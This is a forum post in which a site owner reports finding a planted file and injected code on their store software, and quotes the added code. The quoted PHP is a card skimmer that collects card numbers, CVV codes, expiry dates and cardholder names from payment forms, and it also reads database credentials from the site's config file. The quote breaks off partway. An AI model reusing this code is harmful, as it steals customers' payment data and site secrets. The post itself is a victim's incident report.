I am currently on 2.012
Saw something suspicious and went into Control Panel and looked up latest vistors. Noticed a IP address
going into
<div>/lib/Text/Diff/Engine/restore.php?g</div>
<div> </div>
<p>plus also into </p>
<div>/js/core.js</div>
<p> </p>
I have the original files and noticed the first file didnt exist with 2.012.
Then i looked at js.core.js and also saw the below added to file. looks like they are trying to capture credit cards. I deleted first file and replaced the second file with the original. This just happened as im also manually looking into all the other files.
Hopefully this is not another exploit of the software like the one last winter.
Below was added to js/core.js
error_reporting(0);
$r = $_POST;
$naem = 'justcoMMONS';
$cookiename = 'sess_id';
if (isset($r['payment_info']['card_number'])) {
$r = $r['payment_info'];
$f = array(
'card_number',
'cvv2',
'expiry_month',
'expiry_year',
'cardholder_name'
);
foreach ($f as $ff)
$ok[] = $r[$ff];
$conf = file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/config.local.php');
$fields = array('db_host', 'db_name', 'db_user', 'db_password');
$db = array();
foreach ($fields as $f) {
preg_match('#^\$config\[[\'"]' . $f . '[\'"].+?[\'"](.+?)[\'"]#m', $conf, $m);
$db[$f] = $m[1];